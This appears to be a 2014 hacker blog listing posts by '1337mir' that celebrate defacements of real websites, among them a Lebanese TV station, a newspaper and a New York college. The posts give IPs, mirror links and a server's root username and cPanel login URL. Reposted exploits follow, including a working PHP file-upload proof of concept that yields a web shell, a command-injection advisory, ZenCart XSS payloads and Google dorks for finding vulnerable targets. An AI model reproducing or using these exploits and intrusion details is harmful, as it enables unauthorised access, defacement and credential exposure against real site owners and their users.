hacking

server saturno.tropicalserver.net penetrate and security

By |May 11th, 2014|

server saturno.tropicalserver.net penetrate and security tested by 1337mir

ip:188.165.93.13
host:saturno.tropicalserver.net
root user: info2com
root password: in*****(hidden for security reason)
login: http://188.165.93.13:2082/

defaced page link: http://zone-h.net/mirror/id/22343943

Notified all users to change their passwords and sent them vulnerability details via email.

cpanel username and password below:


O TV Lebanon penetrate and hacked

By |May 4th, 2014|

O TV Lebanon penetrate and hacked By 1337MiR.
website address: http://www.otv.com.lb
ip: 65.254.41.214
date: 05-04-14

defaced page: http://www.otv.com.lb/1337mir.html
cache mirror: http://dark-h.org/deface/id/57336

Contacted them, but they didn't respond.


Kesserwen Al Asiya Newspaper website penetration testing

By |May 3rd, 2014|

Kesserwen Al Asiya Newspaper website penetration testing by 1337mir.
website: http://kesserwen.org/
ip: 192.217.123.88
date: 05-03-2014 09:36AM
deface page: http://kesserwen.org/1337mir.html
zone-h mirror: http://zone-h.net/mirror/id/22295807

Contacted them, but they didn't respond.


WordPress plugin EZPZ One Click Backup Command Injection

By |May 2nd, 2014|

Product: WordPress plugin EZPZ One Click Backup
Vulnerability type: CWE-78 OS Command Injection
Vulnerable versions: 12.03.10 and some earlier versions
Google Dork: intext:plugins/ezpz-one-click-backup/
Credits: Henri Salo
Fixed version: N/A
Solution: Remove plugin
Vendor notification: Contact details N/A
WordPress plugins team notification: 2014-04-30
Risk: High
CVE: CVE-2014-3114

Vulnerability Details:

The plugin contains a flaw: input passed via the 'cmd' parameter in
ezpz-archive-cmd.php is not properly sanitized. With […]


WordPress Themes Theagency File Upload Vulnerability

By |April 29th, 2014|

Title : WordPress Themes Theagency File Upload Vulnerability
Author : AnonBoy
Google Dork : inurl:/wp-content/themes/theagency
Date : 21/04/2014
Facebook : https://www.facebook.com/nufailienafratsim.moechtar
Vendor : N/A
Tested on : Windows 7

POC:
<?php

$uploadfile = "x.php.jpg";
$ch = curl_init("http://localhost/wp-content/themes/theagency/includes/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata' => "@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print “$postResult”;
?>
Shell Access:
http://localhost/wp-content/themes/theagency/includes/uploadify/uploads/x.php.jpg
————————————————————————————–

Greeting:./Trojanspot ./Sacker_Boy ./chliZAceh ./Rijal North Aceh ./Sijulai ./Reja-exe ./TNCA ./Poo Chai ./Mirzja ./hexy khan
./Gantengers Crew


Metropolitan College of NewYork website penetrate

By |March 13th, 2014|

Metropolitan College of NewYork website penetration testing by 1337mir

website: http://www.mcny.edu/
ip: 216.70.80.92
defaced page: http://www.mcny.edu/1337mir.html
zone-h mirror: http://zone-h.net/mirror/id/22004967

 


ZenCart 1.5.1 Multiple Vulnerabilities

By |February 24th, 2014|

Exploit Title: ZenCart v1.5.1 – Multiple Vulnerabilities
Exploit Author: UmPire
Date: 21 Feb 2014
Vendor Homepage: https://www.zen-cart.com/
Version: 1.5.1
Tested on: Windows
Google Dork: inurl:"zc_install/index.php"

Cross Site Scripting Vulnerability
The fourth step of installation contains vulnerable fields.
vulnerable input: " onmouseover=alert(/Hacked/) bad="

Full Path Disclosure
This vulnerability occurs in the third step of installation:
Path_Translated = Drive:\\[WebPage-Directory]\\[USER]\\zen\\zc_install\\index.php

Sensitive phpinfo reading
The phpinfo page is exposed at this path:
http://[Host]/zen/zc_install/includes/phpinfo.php

Demo […]
